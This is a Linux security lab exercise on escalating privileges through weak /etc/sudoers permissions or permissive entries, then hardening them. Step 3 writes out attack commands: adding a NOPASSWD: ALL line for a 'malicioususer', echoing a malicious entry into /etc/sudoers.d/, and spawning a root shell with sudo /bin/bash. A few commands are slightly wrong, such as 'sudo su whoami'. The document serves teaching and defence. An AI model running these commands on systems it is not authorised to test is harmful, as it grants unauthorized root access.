Exercise 13: Exploiting Insecure Service Permissions (Sudoers File)

Objective: Understand how to identify and exploit weak permissions or misconfigurations in the /etc/sudoers file to escalate privileges, and learn best practices for securing sudo configurations.

Scenario: The /etc/sudoers file controls which users can run commands as root or other users. Misconfigurations or improper permissions on this file can lead to privilege escalation. Your task is to assess its security, exploit any identified weaknesses, and implement strategies to secure the sudoers configuration.

Lab Setup

1. Environment:
   • A Linux system with the sudo service enabled.
   • A misconfigured /etc/sudoers file.
2. Tools Required:
   • Terminal access to the Linux system.
   • Knowledge of visudo or text editor usage.

Lab Steps

Step 1: Check Permissions on /etc/sudoers

Verify the file permissions:

ls -l /etc/sudoers

Proper permissions should be:

-r--r----- 1 root root 440 /etc/sudoers

If writable by other users or groups (e.g., -rw-rw-r--), it is vulnerable.

Check the /etc/sudoers.d/ directory for additional configuration files:

ls -l /etc/sudoers.d/

Step 2: Identify Misconfigurations in Sudoers Entries

Open the /etc/sudoers file using a safe method:

sudo visudo

Look for entries that grant unnecessary privileges:

Example of a misconfigured entry:

user ALL=(ALL) NOPASSWD: ALL

This allows the user to execute any command as root without a password.

Verify if the user can execute specific binaries with elevated privileges:

sudo -l

Example output:

(ALL) NOPASSWD: /bin/bash

Step 3: Exploit Insecure Sudoers Configurations

Modify /etc/sudoers Directly:

If the file is writable, add the following line to grant root privileges:

malicioususer ALL=(ALL) NOPASSWD: ALL

Save and exit.

Exploit Specific Binaries:

If a user has NOPASSWD permissions for a binary like /bin/bash, escalate privileges:

sudo /bin/bash 

whoami

Leverage Writable Sudoers Files in /etc/sudoers.d/:

Add a malicious entry to a writable file:

echo 'user ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers.d/malicious

Validate the configuration:

sudo visudo -c

Step 4: Gain Root Access

Once the exploit is successful, verify root privileges:

sudo su whoami

Solution

Explanation:

• The /etc/sudoers file controls user privileges. Misconfigurations or weak permissions can allow attackers to escalate privileges by modifying the file or exploiting permissive entries.

Prevention:

Secure File Permissions:

Ensure /etc/sudoers has proper permissions:

chmod 440 /etc/sudoers 
chown root:root /etc/sudoers

Audit Sudoers Configurations:

Regularly review /etc/sudoers and /etc/sudoers.d/ for unnecessary entries.

Use least privilege principles to restrict user access.

Use Visudo for Editing:

Always use visudo to edit the file to prevent syntax errors.

Limit Sudo Commands:

Restrict users to specific commands instead of granting full access:

user ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx

Testing and Verification

After hardening the sudoers file, test user access to ensure privileges are correctly restricted.

Attempt to exploit previous vulnerabilities to confirm they are mitigated.

Monitor logs for unauthorized sudo access attempts:

sudo tail -f /var/log/auth.log

Reflection

This exercise highlights the importance of securing the sudoers configuration to prevent privilege escalation. By exploiting and hardening the /etc/sudoers file, you’ve gained valuable insights into securing administrative access on Linux systems.